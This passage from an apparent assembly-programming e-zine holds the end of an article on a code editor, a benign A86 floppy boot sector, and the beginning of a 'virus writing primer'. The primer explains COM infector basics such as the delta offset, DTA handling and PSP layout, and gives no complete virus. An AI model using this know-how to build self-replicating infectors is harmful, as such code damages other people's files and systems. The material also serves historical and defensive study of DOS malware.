branch instructions.
I envision that a future version of Define written in machine code, or a
similar program, will have a pop-up list of definitions and use a
point-and-click method of writing the code, as opposed to the current method
of scrolling through them on a different page. The future version will also
need to be able to handle thousands of definitions, as opposed to the few
hundred it can use at a time now, in order to accommodate situations such as
the following:
To call interrupt 21h function 9, which prints a string, it is necessary to put
the function number 9 in AH and the address of the string in the registers
DS:DX and then call the interrupt,
MOV AH,9
MOV DX,address
INT 21h
however it is also valid to put the number 9 in AH after the address of the
string has been put in DS:DX,
MOV DX,address
MOV AH,9
INT 21h
To make a definition for this interrupt at least two definitions will need to
be made, and therefore a larger definition file. This also doesn't account for
the situation in which the number 9 was loaded three instructions earlier and
is assumed to be correct at the time the interrupt is called; in this case
only the definitions for the individual instructions will be seen and not a
definition for the interrupt.
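The need for two definitions shows up clearly at the byte level. In the sketch
below the opcodes are the standard 8086 encodings (B4 = MOV AH,imm8,
BA = MOV DX,imm16, CD = INT); the ANY marker, the PRINT_STRING table and the
is_print_string function are assumptions made for this illustration.

```python
ANY = None    # stands for an undefined byte, here the two address bytes

# One byte pattern per instruction ordering.
PRINT_STRING = [
    (0xB4, 0x09, 0xBA, ANY, ANY, 0xCD, 0x21),   # MOV AH,9 / MOV DX,addr / INT 21h
    (0xBA, ANY, ANY, 0xB4, 0x09, 0xCD, 0x21),   # MOV DX,addr / MOV AH,9 / INT 21h
]


def is_print_string(code, pos=0):
    """True if code at pos matches either ordering of the print call."""
    for pattern in PRINT_STRING:
        chunk = code[pos:pos + len(pattern)]
        if len(chunk) == len(pattern) and all(
            p is ANY or p == b for p, b in zip(pattern, chunk)
        ):
            return True
    return False


ah_first = bytes([0xB4, 0x09, 0xBA, 0x10, 0x01, 0xCD, 0x21])
dx_first = bytes([0xBA, 0x10, 0x01, 0xB4, 0x09, 0xCD, 0x21])
ah_set_earlier = bytes([0xBA, 0x10, 0x01, 0xCD, 0x21])
print(is_print_string(ah_first), is_print_string(dx_first),
      is_print_string(ah_set_earlier))
```

The third sequence, where AH was loaded somewhere earlier, matches neither
pattern, which is exactly the case the article says falls back to plain
instruction definitions.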
One of the best aspects of Define, in my book, is that memory can be viewed
according to a person's level of understanding (or will be, as the definitions
are written); for example, the program is able to show only definitions of a
certain level and no other. I have chosen to represent the level of a
definition by its color. I have used blue (1) for the lowest level, which are
the instruction set definitions, then green (2) for the next level, which are
the DOS, BIOS, etc. definitions, then magenta (3) for the next level, which may
be definitions to clear the screen and print the date combined, and so on, so
that a person who knows little about machine code may set the maximum
definition color to red (4) and still be able to write a program using Define.
The advantage for those who know machine code is that they need not be
restricted to only a high level definition: by turning the observance of the
color off they can press the letter B when viewing a high level definition and
see the lower level definitions that make up the higher one. By repeatedly
pressing B they can view the program as level 1 (blue) or even as the byte
values themselves.
The most radical departure from most assemblers is that a program is composed
in memory as it is written: the byte values of the definitions are written
directly to an unused or reserved area of memory, where they can be further
altered directly while reading memory. This could also be said to be the most
dangerous method, as it can easily lead to accidentally overwriting other areas
of memory. While this is true, I have also found a benefit: if Define is
stopped and then restarted, the program being written will still be in memory
without having been saved (depending on where in memory the program is being
written).
The maker of a violin, while demonstrating it, must have said at one time or
another "A good violinist could really show you how to play it". Like the maker
of a violin, I too am sure there are better definition writers than myself. For
Define to become a high level language the high level definitions need to be
written, and I ask any person who has a passion for writing hand-written code
to send me a definition or two to include in the definition file.
You can download Define from my homepage at
http://members.net-tech.com.au/alaneb/default.htm
and there is a step by step guide to using the program, called manual.doc, in
the zip file.
Please send any definitions or responses to Alan at alien1_3@...
::/ \::::::.
:/___\:::::::.
/| \::::::::.
:| _/\:::::::::.
:| _|\ \::::::::::.
:::\_____\:::::::::::...........................................FEATURE.ARTICLE
Writing a Boot Sector in A86
by Jan Verhoeven
I have been coding for FreeDOS for some time, but that is a C project and I
rather hate C. It is so clumsy. That's also why I always code in A86
assembly language, the "No Red Tape" assembler that makes life a lot
easier for programmers.
A86 is good. The debugger (D86) could be better, but not too much. I
registered my version and I want to encourage everyone to follow my
lead. The software is good enough to pay for it. And it ensures proper
development of the software. If you can spare 20 bucks a month for the
ISP, you should also spend this on quality software.
During the last two years I have been submitting bugs to Isaacson and
all of them have been fixed in the latest version (4.03).
Besides being the best assembler around, A86 has some idiosyncrasies
that some people need to get used to. Plus my personal preferences,
which might add to that...
- When I refer to a memory location I use square brackets.
- I use single quotes for texts
- I use most of the A86 features.
Some of the A86 features are:
- very powerful macro language
- numbers starting with a ZERO are ALWAYS hex, no matter how they end
- easy IF statements to reduce nonsense labelnames
- local labels, like below: only two local labels.
I started out on the Z-8000, back in 1981, switched to the Z-80, Z-8,
8086, PIC 16Cxx, some 8051 (Barffff), some 68K (yummie yummie). Mainly
in ASM and else in Modula-2. I have some really cool and useful routines
lying around for DOS. And I'm gonna share them with the world.
The following code is a bootsector which can be used for non-bootable
disks, in this case for a 1.44 MB floppy disk. You could use it to make
a commercial out of every non-bootable disk.
First the code:
----- Code file -------------------------------------------------
name flopnb
title Floppy disk boot sector, non-bootable, 1.44 Mb
page 80, 120
; version 1.0 : It works : OK 12-12-1998
lf = 10
cr = 13
org 0
jmp short main ; this is critical!
nop ; and this too!
; ----------------------
OEMname db 'StupiDOS'
BpS dw 512 ; bytes per sector
SpA db 1 ; sectors per allocation unit (=cluster)
ResSect dw 1 ; reserved sectors, starting from sector 0
NrFats db 2 ; number of FAT's on this disk
FiR dw 224 ; number of entries in ROOT directory
Total dw 2880 ; number of sectors per disk
ToM db 0F0 ; Type of Media
SpF dw 9 ; Sectors per Fat
SpT dw 18 ; sectors per Track
Heads dw 2 ; number of heads
Hidden dw 0, 0 ; Hidden sectors
GrandTot dd 0 ; total for disks over 32 Mb
IntId db 0, 0
BootSign db 029 ; extended boot signature
VolumeID dd 0566E614A ; serial number ...
DiskLabl db 'DOS is MINE' ; volume label
FATtype db 'FAT-12 ' ; FAT type
db 'VeRsIoN=1.0', 0 ; for version control only
; ----------------------
L1: push si ; stack up return address
ret ; and jump to it
print: pop si ; this is the first character
mov bx, 0 ; video page 0
L0: lodsb ; get token
cmp al, 0 ; end of string?
je L1 ; if so, exit
mov ah, 0E ; else print it
int 010 ; via TTY mode
jmp L0 ; until done
; ----------------------
main: cld ; init direction flag
cli ; take care of 1 faulty batch of 88's in 1980
mov ax, 07C0 ; this is the segmentvalue at start
mov ds, ax ; store it in DS, ES
mov es, ax
mov ax, 0 ; clear ax ...
mov ss, ax ; ... to prime the SS register
mov sp, 07C00 ; set stackpointer
sti ; OK, interrupts may come again
call print ; show that message
db cr
db 'This is not a bootable floppy. '
db 'Please strike any key to reboot.', cr, lf
db 'This floppy disk is formatted by FreeDOS', cr, lf, lf
db 'Please visit us at www.freedos.org', cr, lf, 0
L0: mov ah, 1 ; wait for keypress by ...
int 016 ; ... interrogating keyboard
jz L0 ; if no key pressed, loop back
mov ax, 0 ; else address system variables
mov es, ax ; in order to ...
es mov w [0472], 01234 ; signal: NO POST and go on ...
jmp 0FFFF:0000 ; with the next reboot
org 01FE ; look for the dotted line and ...
db 055, 0AA ; ... don't forget to sign!
------------------------------------------------- Code file -----
The first three lines are straightforward: name, title and page. Not
much to tell about that. Then some version info for the programmer, some
equates and the ORG statement.
If no ORG is supplied, A86 will assume it is ORG 0100. I ordered an ORG 0,
which means several things:
- start assembly at address 0
- the output file will be called *.BIN
Bootsectors must start with some particular bytes. The first three bytes
need to be either a short jump (opcode plus a one-byte offset) followed
by a NOP, or a near jump (opcode plus a two-byte offset) without a NOP.
At offset 03 of the bootsector comes an OEM name, followed at offset 0B
by the BPB (BIOS Parameter Block), which tells the OS what kind of disk
this is. Please put ASCII in the OEM name, or virus scanners might trip
on it with a "Bloodhound warning".
After the description of the geometry of this disk, I included an
extended boot signature, since we have ample room left. It contains
Volume ID, Disk Label, and FAT-type strings.
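The field layout declared in the listing can be checked from a high-level
language. The sketch below packs the same values with Python's struct module;
it is only an illustration, and both the placeholder jump offset and the
space-padding of the FAT type to 8 bytes are assumptions.

```python
import struct

# First 62 bytes of the sector, field by field as declared in the listing
# (little-endian, no padding between fields).
BOOT_HEADER = struct.Struct("<3s8sHBHBHHBHHHIIBBBI11s8s")

header = BOOT_HEADER.pack(
    b"\xEB\x00\x90",          # jmp short + nop; the offset byte is a placeholder
    b"StupiDOS",              # OEMname
    512, 1, 1, 2, 224, 2880,  # BpS, SpA, ResSect, NrFats, FiR, Total
    0xF0, 9, 18, 2,           # ToM, SpF, SpT, Heads
    0, 0,                     # Hidden, GrandTot
    0, 0,                     # IntId
    0x29, 0x566E614A,         # BootSign, VolumeID
    b"DOS is MINE",           # DiskLabl (11 bytes)
    b"FAT-12 ".ljust(8),      # FATtype, padded with spaces to 8 bytes
)
fields = BOOT_HEADER.unpack(header)
bytes_per_sector, total_sectors = fields[2], fields[7]
capacity = bytes_per_sector * total_sectors
print(BOOT_HEADER.size, capacity)
```

The capacity works out to 2880 sectors of 512 bytes, which agrees with the
geometry given in the same block: 80 tracks, 2 heads, 18 sectors per track.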
The PRINT subroutine is a nice one. It will print the ASCIIZ string that
follows it. This is quite a handy routine since you can simply change
messages without having to worry about the address and length of the
actual message.
Print is called like this:
call print
db 'Hello World', cr, lf, 0
...
Print takes the "return address" off the stack. This of course is no
return address but the address of the message. What follows is easy:
- get next character
- IF (non-zero) print character ELSE leave loop ENDIF
- the current si pointer is the actual return address... So we push it
- and return to caller.
Perhaps a jmp si could be possible too, but I like clear code, in most
cases. If you need obfuscated code, switch to C. :)
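For readers who want to trace the trick without a debugger, here is a small
emulation of what PRINT does with the return address. It is a sketch, not A86
code: call_print is a hypothetical function, memory is a Python bytes object,
and the three bytes standing in for the CALL instruction are placeholders.

```python
def call_print(memory, return_address):
    """Emulate 'call print' followed by an inline ASCIIZ string.

    return_address is what CALL pushed: the address of the first character.
    Returns (text, resume_address).
    """
    si = return_address                # pop si
    chars = []
    while True:
        al = memory[si]                # lodsb
        si += 1
        if al == 0:                    # end of string?
            break
        chars.append(chr(al))          # int 010 with ah = 0E
    return "".join(chars), si          # push si / ret


# Placeholder CALL bytes, then the message, then the next instruction (NOP).
code = b"\xE8\x00\x00" + b"Hello World\r\n\x00" + b"\x90"
text, resume = call_print(code, return_address=3)
print(repr(text), resume, hex(code[resume]))
```

Execution resumes at the byte just past the terminating zero, which is why
the message can change length without any other part of the program caring.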
The actual program is very simple. It just sets up a stack and the
segment registers, and then prints that it will do nothing. Gee, what a
life...
After the message we wait for a key, and then:
- signal a fast reboot (no POST)
- jump to the reboot vector
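Several of the constants in the listing are segment:offset pairs, and it helps
to see the physical addresses they name. The helper below is a sketch of
real-mode address arithmetic; the function name is made up, and the 20-bit
wrap models an 8086 without the A20 line.

```python
def linear(segment, offset):
    """Physical address of segment:offset in real mode (20-bit wrap)."""
    return ((segment << 4) + offset) & 0xFFFFF


print(hex(linear(0x07C0, 0x0000)))   # DS:0000, where the BIOS loaded the sector
print(hex(linear(0x0000, 0x7C00)))   # SS:SP, stack grows down from the same spot
print(hex(linear(0x0000, 0x0472)))   # the word that receives 01234
print(hex(linear(0xFFFF, 0x0000)))   # target of the final far jump
```

The first two pairs name the same physical address, so the stack sits directly
below the loaded sector, and 0000:0472 is the same location as 0040:0072 in
the BIOS data area.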
Whatever there will be between end of code and offset 01FE is not
relevant (it could be your ad) but the last two bytes of the boot sector
must be a valid boot signature.
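The padding and signature rule is easy to verify on an assembled image. The
sketch below builds a 512-byte sector from arbitrary code bytes and checks the
last two bytes; make_sector and has_boot_signature are hypothetical helpers,
and the two-byte "code" is only a stand-in.

```python
SECTOR_SIZE = 512


def make_sector(code, filler=b"\x00"):
    """Pad code up to offset 01FE with a one-byte filler and sign it."""
    if len(code) > SECTOR_SIZE - 2:
        raise ValueError("code does not fit in front of the signature")
    padding = filler * (SECTOR_SIZE - 2 - len(code))
    return code + padding + b"\x55\xAA"


def has_boot_signature(sector):
    return len(sector) == SECTOR_SIZE and sector[0x1FE:0x200] == b"\x55\xAA"


sector = make_sector(b"\xEB\xFE")      # stand-in code: jmp short to itself
print(len(sector), has_boot_signature(sector))
```

Anything may go in the padding, but a sector whose last two bytes are not
055, 0AA will not be accepted as a boot sector.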
That's it. With this code you can make your own custom non-bootsector.
I hope this software has also shown that linking and assuming are
supported by A86, but certainly not necessary. Also, this software does
not rely on any HLL calls. It's just assembly language as it should be.
I want to remark that this software is Open Source, according to the rules
of the GNU GPL. Make sure you understand these rules before embedding this
routine in your own software.
::/ \::::::.
:/___\:::::::.
/| \::::::::.
:| _/\:::::::::.
:| _|\ \::::::::::.
:::\_____\:::::::::::...........................................FEATURE.ARTICLE
A Basic Virus Writing Primer
by Chili
What horror must the ignorant victim undergo as it becomes aware of a being
that lives inside its own body, growing ever stronger, reproducing itself until
its host, unable to bear more, finally collapses and dies a horrible death. What
panic it must feel, knowing nothing can be done in time to avoid such a
terrible fate. A predator so tiny that it spreads unsuspected from one host
to another, thereby rapidly infecting millions. An organism so utterly
resourceful and small that it stays undetectable most of the time, breeding in
the shadows.
Computer viruses aren't much different from their biological counterparts, but
instead of infecting cells they infect files and boot sectors. In this article
I'll try to explain the basics of file viruses, more specifically runtime (aka
direct action) COM infectors. This will cover most simple search and
replication methods used and is only to be considered as an introduction to
virus writing. After some thought I've decided not to include any full source
code for a working virus, since anyone with half a brain and a somewhat
mediocre knowledge of assembly can easily build a virus out of the pieces of
code that will be presented. Furthermore it's not my wish to increase the
number of viruses in the wild, which would undoubtedly happen at the hands
of some I-have-no-brain-and-can't-program-hellspawn bent on random destruction.
Anyway, on with the article...
Some Sort Of 'Programming Virii Safely' Guide
---------------------------------------------
The only really safe way to program viruses is to know what you're doing and
understand at all times how the virus is behaving. If you test a virus on your
own machine without fully comprehending its ins and outs, then you will most
likely have your system trashed. It would be best if you had a second computer
just for this purpose, since buggy programming can lead to a lot of crashes
and general havoc. If not, a Ramdrive can be created and a Subst can be done,
so that all accesses to physical drives are redirected to the virtual one.
Assuming that you want your Ramdrive to have 512-byte sectors, a limit of 1024
entries and to allocate 2048K of extended memory, you must add this line to
your CONFIG.SYS:
DEVICE=C:\DOS\RAMDRIVE.SYS 2048 512 1024 /E
Then you must copy COMMAND.COM and SUBST.EXE to the Ramdrive so that DOS won't
hang and also in order for you to be able to delete all redirections when done.
And to associate all physical drives to the newly created virtual drive (and
assuming that it is D: and all your drives are A: and C:) you should do:
SUBST A: D:\
SUBST C: D:\
Of course this last method isn't perfect. You should always know how to
completely remove a virus before running it, or you'll end up cleaning up the
mess for quite some time.
Just use common sense. For example, if you're writing a virus aimed at a
specific file type, all you have to do is copy all files of that type you do
not wish to be infected to a different extension and when you're done testing
just switch those files back to their original extension. While testing you
should also place breakpoints and warning messages throughout the code, so
that you know at all times what the virus is doing; this will also help you
debug it. You should also program and test different routines separately, as
this reduces complexity and the likelihood of bugs. Lastly, the use of memory
and disk mapping/editing utilities, a good set of anti-virus programs and, most
importantly, backups is encouraged, so that you can keep track of things and
are able to restore your system in case something goes wrong.
In case things get really out of hand you should always have a clean "rescue
disk", which you should create by doing a FORMAT A: /S /U and then copying onto
it some useful DOS files like FORMAT.COM, UNFORMAT.COM, FDISK.EXE, SYS.COM,
MEM.EXE, ATTRIB.EXE, DEBUG.EXE, CHKDSK.EXE, SUBST.EXE, a text editor just in
case and whichever other files you may find useful. An anti-virus should also
be included. Don't forget to write-protect the disk and put it in a safe
place. The first thing you should do in order to clean up your system is to
boot from your previously created disk and use your anti-virus's cleaning and
restoration features, as most times this will work, saving you a lot of hassle.
As a last resort, you should run FDISK /MBR to re-write the executable code and
error messages of the partition sector, then run FDISK and first delete, then
create a new partition table and finally run FORMAT C: /S /U. Your system should
now be completely clean and you can restore your backups at this time. If all
you want is to clean a floppy disk instead of a hard disk, then all you have to
do is run FORMAT A: /S /U to create a new boot sector, FAT and root directory.
Of course, after these procedures all data will be lost, so as I said before
this should only be used if you're really desperate.
Above all, don't forget to backup, backup, backup!
Tools & References
------------------
In order to write and test a successful virus you need some useful programs and
references, such as:
- An assembler (TASM, MASM, Intel's ASM86, A86, NASM, ...) - I recommend using
Turbo Assembler, as all code I will provide will be tested with it.
- A linker (TLINK, LINK, Intel's LINK86...) - Again I recommend Turbo Linker.
- A debugger (Dos' DEBUG, TD, ...) - Dos' DEBUG is old but will do the job, you
can use Turbo Debugger though, as it is somewhat better.
- A text and a hex editor of your choice.
- A disassembler (DEBUG, Sourcer, IDA, ...) - You can use Dos' DEBUG, but would
be better if you used Sourcer which is very good or IDA which is excellent
but very large in size.
- Some other things like TSR Utilities by TurboPower Software, Norton Utilities
and more.
- A good set of Anti-Virus packages, such as ThunderBYTE Anti-Virus (which has
a great set of utilities to back up your bootsector, partition table and CMOS),
AVP
(AntiViral Toolkit Pro) and F-PROT. Also available are McAfee (now Network
Associates, I think) VirusScan, Dr.Solomon's AVTK and Norton Anti-Virus.
- Ralph Brown's x86/MSDOS Interrupt List, Norton Guides' Assembly Language
database, David Jurgens' HelpPC, DOSREF (Programmers' Technical Reference for
MSDOS and the IBM PC) and others you find useful.
On Viruses
----------
There are two things that must always be present in every working virus: first
the search routine, which seeks suitable targets for the virus to infect, and
second the replication routine, which copies the virus to the found target.
Other routines may also be added in order to enhance the virus, and the two
basic and essential parts can be improved, increasing its performance, albeit
at the cost of added complexity.
I intentionally left out a major routine, the payload (aka activation routine).
Though not necessary, it is present in almost all viruses. Frankly, I see no
real use for most activation routines, since all they do is seriously cripple
the virus's chance to spread. Besides, all good payloads must be custom made (as
should all viruses, but that's another story...), so you'll have to build your
own if you want one. For some old good examples of non-destructive payloads
take a look at Ambulance Car, Cascade, Den Zuk, Corporate Life and Crucifixion.
All code presented hereafter was first tested on both of my machines and works,
but this doesn't mean that it will work on all possible configurations, so I
can't fully guarantee that it won't ever cause unwanted damage. It's bad enough
that your virus may unintentionally trash someone's data, so don't go writing
destructive payloads just for the hell of it. Programming - and therefore virus
writing - is an art, treat it as such.
A Word On Error Trapping
------------------------
Error trapping is regrettably one of the most forgotten things in viruses. You
should always account for errors in order not to crash or, worse, trash things.
This doesn't mean that you should present cute DOS-like error messages, as this
would alert the user; instead you should process the information and act
accordingly. Most of the time that just means aborting the virus's ongoing
operations and returning control to the host.
Optimization
------------
All code will be presented in an unoptimized form for ease of understanding and
also because all routines are shown separate from each other so that they are
portable to different kinds of viruses. When writing a full virus you should
always optimize your code, so that it takes as little space as possible. Don't
use procedures unless you can save space by doing so. Also don't use variables
when you can use registers (for example the F_Handle variable need not be used
since you could just use the stack or some free register - see below).
Delta Offset
------------
When you're programming a virus that will always be placed at a fixed location,
like overwriting and prepending viruses, you won't have to worry about any of
this, but if you're writing a virus that relocates part of its code to a random
location, such as appending and midfile infectors, you'll have to account for
the displacement. This doesn't affect most jumps and calls, since they are
relative, but data on the other hand is referred to by an absolute offset.
Things would work fine the first time you assembled and ran the virus, but not
after the first infection, when all memory addresses would have changed.
To account for this all one has to do is:
--8<---------------------------------------------------------------------------
Delta_Offset:
call Find_Displacement
Find_Displacement:
pop bp
sub bp, offset Find_Displacement
---------------------------------------------------------------------------8<--
What this piece of code does is first issue a CALL to the next instruction, so
that instruction's IP (Instruction Pointer) is pushed onto the stack; next we
POP it into the register BP (it is good programming practice to use BP, which
stands for Base Pointer), and finally we SUBtract the original OFFSET determined
when the virus was assembled. Of course the first time the virus is run, the
displacement will be zero; only on subsequent runs will it change according to
the host size.
I'll be presenting code for infectors that require delta offset calculation, so
for all the other infectors that don't, in order to accommodate any of the code
presented hereafter you'll just have to strip out any displacement calculations
as in the following examples:
Replace
lea dx, [bp+offset DTA]
With
lea dx, DTA
Replace
mov word ptr [bp+F_Handle], ax
With
mov F_Handle, ax
Once you've given it a little thought and figured it out, it's not as hard as it
may first seem. Of course, even if you're programming a fixed location virus you
can still leave all code as if you were writing one that needed you to calculate
the delta offset, since the displacement is always zero. Nevertheless you
shouldn't do this, mainly because it adds unnecessary size to the virus and it
is extremely sloppy (and lazy) programming (copying?!?!).
.COM File Structure
-------------------
COM files are raw binary executables, designed for compatibility with the old
CP/M operating system. Whenever a COM file is executed, DOS first sets aside a
segment (64K) of memory for it, then builds a PSP (Program Segment Prefix) in
the first 256 bytes, after which the program is loaded at offset 100h. Before
passing control to the program, DOS sets up a few things, among which are:
1) Register AX reflects the validity of drive specifiers entered with the
   first two parameters as follows:
     AL=0FFh if the first parameter contained an invalid drive specifier,
     otherwise AL=00h
     AH=0FFh if the second parameter contained an invalid drive specifier,
     otherwise AH=00h
2) All four segment registers contain the segment address of the PSP control
block
3) The Instruction Pointer (IP) is set to 100h
4) The SP register is set to the end of the program's segment and a word of
zeroes is placed on top of the stack
In case any of these things are changed during the virus execution, you
shouldn't forget to restore them before passing control back to the host.
So, given this, a COM file program can only have a maximum size of 65278 bytes
(65536 - 256 - 2), since you have to account for the 256-byte PSP and at least
for the two bytes occupied by the stack. Here is how a COM file looks when
loaded in memory:
FFFFh +--------------------+ <- SP
      |                    |
      |       Stack        |
      |                    |
      +--------------------+
      |                    |
      | Uninitialized Data |
      |                    |
      +--------------------+
      |                    |
      |   COM File Image   |
      |                    |
 100h +--------------------+ <- IP
      |                    |
      |        PSP         |
      |                    |
   0h +--------------------+ <- CS, DS, ES, SS
Don't forget to account for the stack growth needed by your program as well as
any uninitialized data. If you don't, there is a chance that it will crash,
since the stack may grow large enough to overwrite data or code, or your data
may wrap around and overwrite the PSP and the code.
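The bookkeeping above can be sketched in a few lines of Python. This is only an
illustration of the arithmetic (one 64K segment, minus the PSP, minus the word
DOS places on the stack); the function names and the sample sizes are made up
for the example and are not part of any DOS interface.

```python
SEGMENT_SIZE = 0x10000   # one 64K segment
PSP_SIZE = 0x100         # the PSP occupies offsets 0h..FFh
MIN_STACK = 2            # the word of zeroes DOS places on the stack

def max_com_image_size():
    """Largest file image that still leaves room for the PSP and one stack word."""
    return SEGMENT_SIZE - PSP_SIZE - MIN_STACK

def com_stack_headroom(image_size, uninit_size=0):
    """Bytes left over for stack growth; a negative result means the
    image plus its uninitialized data does not fit in the segment."""
    return max_com_image_size() - image_size - uninit_size

# Hypothetical program: 60000-byte image with a 4096-byte scratch buffer
print(max_com_image_size())
print(com_stack_headroom(60000, 4096))
```

A small or negative headroom is the situation the paragraph above warns about:
the stack and the data end up sharing the same bytes.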
Program Segment Prefix (PSP)
----------------------------
A PSP is created by DOS for all programs and contains most of the information
one needs to know about them. Its structure looks like this:
                 [ PSP - Program Segment Prefix ]
Offset  Size       Description
------  ----       -----------
  0h    Word       INT 20h instruction
  2h    Word       Segment address of top of the current program's
                   allocated memory
  4h    Byte       Reserved
  5h    5 Bytes    Far call to DOS function dispatcher (INT 21h); the
                   instruction overlaps the two words that follow
  6h    Word       Available bytes in the segment for .COM files
  8h    Word       Reserved
  Ah    Dword      INT 22h termination address
  Eh    Dword      INT 23h Ctrl-Break handler address
 12h    Dword      DOS 1.1+ INT 24h critical error handler address
 16h    Word       Segment of parent PSP
 18h    20 Bytes   DOS 2+ Job File Table (one byte per file handle,
                   FFh = available/closed)
 2Ch    Word       DOS 2+ segment address of process' environment
                   block
 2Eh    Dword      DOS 2+ process' SS:SP on entry to last INT 21h
                   function call
 32h    Word       DOS 3+ number of entries in JFT
 34h    Dword      DOS 3+ pointer to JFT
 38h    Dword      DOS 3+ pointer to previous PSP
 3Ch    20 Bytes   Reserved
 50h    3 Bytes    DOS 2+ INT 21h/RETF instructions
 53h    9 Bytes    Unused
 5Ch    16 Bytes   Default unopened File Control Block 1 (FCB1)
 6Ch    16 Bytes   Default unopened File Control Block 2 (FCB2)
 7Ch    4 Bytes    Unused
 80h    Byte       Command line length in bytes
 81h    127 Bytes  Command line (ends with a Carriage Return 0Dh)
Note: For a more detailed explanation of the PSP structure, including many
undocumented features, see Ralf Brown's x86/MSDOS Interrupt List.
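To make the offsets in the table concrete, here is a rough Python sketch that
picks a few of the fields out of a 256-byte PSP image (for instance one dumped
from a debugger). The function name, the returned dictionary keys and the
hand-built demo PSP are all assumptions made for this example.

```python
import struct

def parse_psp(psp):
    """Extract a few documented fields from a 256-byte PSP image."""
    if len(psp) != 256:
        raise ValueError("a PSP is exactly 256 bytes long")
    mem_top, = struct.unpack_from("<H", psp, 0x02)   # word at 2h
    env_seg, = struct.unpack_from("<H", psp, 0x2C)   # word at 2Ch
    tail_len = psp[0x80]                             # byte at 80h
    tail = psp[0x81:0x81 + tail_len]                 # text at 81h, CR not counted
    return {
        "starts_with_int20": psp[0:2] == b"\xCD\x20",
        "mem_top_segment": mem_top,
        "env_segment": env_seg,
        "command_tail": tail.decode("ascii", errors="replace"),
    }

# Hypothetical PSP filled in by hand, only for the demonstration
demo = bytearray(256)
demo[0:2] = b"\xCD\x20"                      # INT 20h
struct.pack_into("<H", demo, 0x02, 0x9FFF)   # made-up top-of-memory segment
struct.pack_into("<H", demo, 0x2C, 0x1234)   # made-up environment segment
tail = b" /x file.txt"
demo[0x80] = len(tail)
demo[0x81:0x81 + len(tail) + 1] = tail + b"\r"
info = parse_psp(bytes(demo))
print(info)
```

All multi-byte fields are little-endian, hence the `<` in the format strings.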
And here are the default file handles for the Job File Table (JFT):
[ DOS Default/Predefined File Handles]
0 - Standard Input Device, can be redirected (STDIN)
1 - Standard Output Device, can be redirected (STDOUT)
2 - Standard Error Device, cannot be redirected from the command line (STDERR)
3 - Standard Auxiliary Device (STDAUX)
4 - Standard Printer Device (STDPRN)
The File Control Block (FCB) and the Environment Block structures will be
covered in a later article, as they aren't needed for now.
Disk Transfer Area (DTA)
------------------------
For all file reads and writes performed using FCB function calls, as well as
for "Find First" and "Find Next" calls (FCB-based or not), DOS uses a memory
buffer called the Disk Transfer Area. By default it is located at offset 80h in
the PSP and is 128 bytes long. This area is also used by the command tail, so
in order not to interfere with whichever command line parameters there might
be, the Disk Transfer Address should be set to a different location in memory.
This is done like this:
--8<---------------------------------------------------------------------------
Set_DTA:
mov ah, 1Ah
lea dx, [bp+offset DTA]
int 21h
---------------------------------------------------------------------------8<--
;Interrupt: 21h
;Function: 1Ah - Set Disk Transfer Address (DTA)
;On entry: AH - 1Ah
; DS:DX - Address of DTA
;Returns: Nothing
Of course, before passing control back to the host you should restore the
Disk Transfer Address back to its original value:
--8<---------------------------------------------------------------------------
Restore_DTA:
mov ah, 1Ah
mov dx, 80h
int 21h
---------------------------------------------------------------------------8<--
A sufficient buffer area should always be reserved, as DOS will detect and
abort any disk transfers that would fall off the end of the current segment or
wrap around within the segment.
FindFirst Data Block
--------------------
Upon a successful "Find First Matching File" function call the Disk Transfer
Area is filled with a FindFirst Data Block which contains info on the matching
file found; after a "Find Next Matching File" function call that data is
updated. As we'll only be using the DTA for this, all we need to do when setting
a new one is to reserve a 43-byte buffer, which is exactly the size of the
FindFirst Data Block:
--8<---------------------------------------------------------------------------
DTA:
Reserv db 21 dup (?)
F_Attr db (?)
F_Time dw (?)
F_Date dw (?)
F_Size dd (?)
F_Name db 13 dup (?)
---------------------------------------------------------------------------8<--
And here is the FindFirst Data Block structure:
               [ FindFirst Data Block ]
Offset  Size      Description
------  ----      -----------
  0h    21 Bytes  Reserved for DOS use on subsequent Find Next
                  calls - is different per DOS version
 15h    Byte      Attribute of matching file
 16h    Word      File time stamp
 18h    Word      File date stamp
 1Ah    Dword     File size in bytes
 1Eh    13 Bytes  ASCIIZ filename and extension
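As a cross-check of the layout, the same 43 bytes can be described with a
Python struct format string. This is just a sketch for inspecting a dumped
block offline; the helper name and the sample values are invented for the
example.

```python
import struct

# 21 reserved bytes, attribute byte, time word, date word, size dword, 13-byte name
FIND_BLOCK = struct.Struct("<21sBHHI13s")

def parse_find_block(dta):
    """Split the first 43 bytes of a DTA into the FindFirst Data Block fields."""
    reserved, attr, ftime, fdate, size, raw_name = FIND_BLOCK.unpack(dta[:FIND_BLOCK.size])
    # The name is ASCIIZ: keep everything before the first zero byte
    name = raw_name.split(b"\0", 1)[0].decode("ascii", errors="replace")
    return {"attr": attr, "time": ftime, "date": fdate, "size": size, "name": name}

# Hypothetical block as DOS might leave it for a 1234-byte file
sample = (bytes(21) + bytes([0x20]) +
          struct.pack("<HHI", 0x63C5, 0x2B0F, 1234) +
          b"HELLO.COM".ljust(13, b"\0"))
entry = parse_find_block(sample)
print(FIND_BLOCK.size, entry)
```

The format's computed size matching the 43 bytes of the table is a quick way to
confirm that no field was miscounted.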
The file attribute field looks like this:
[File Attribute]
Bit(s) Description
------ -----------
7 6 5 4 3 2 1 0
. . . . . . . 1 Read-only
. . . . . . 1 . Hidden
. . . . . 1 . . System
. . . . 1 . . . Volume label
. . . 1 . . . . Directory
. . 1 . . . . . Archive
x x . . . . . . Unused
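Read as bit masks, the table above translates directly into code. The following
Python sketch (names chosen for this example only) lists which flags are set in
an attribute byte.

```python
# (mask, meaning) pairs taken from the attribute table, bit 0 first
ATTR_BITS = [
    (0x01, "read-only"),
    (0x02, "hidden"),
    (0x04, "system"),
    (0x08, "volume label"),
    (0x10, "directory"),
    (0x20, "archive"),
]

def decode_attr(attr):
    """Return the names of all attribute flags set in the byte."""
    return [name for mask, name in ATTR_BITS if attr & mask]

print(decode_attr(0x21))   # bits 0 and 5 set
print(decode_attr(0x00))   # a normal file has no flags set
```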
The file time field is like this:
[File Time]
Bit(s) Description
------ -----------
F E D C B A 9 8 7 6 5 4 3 2 1 0
. . . . . . . . . . . x x x x x Seconds/2 (0..29) - 2 second increments
. . . . . x x x x x x . . . . . Minutes (0..59)
x x x x x . . . . . . . . . . . Hours (0..23)
And finally the file date field like this:
[File Date]
Bit(s) Description
------ -----------
F E D C B A 9 8 7 6 5 4 3 2 1 0
. . . . . . . . . . . x x x x x Day (1..31)
. . . . . . . x x x x . . . . . Month (1..12)
x x x x x x x . . . . . . . . . Year since 1980 (0..119)
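The two packed words are easy to get wrong by one bit, so here is a small
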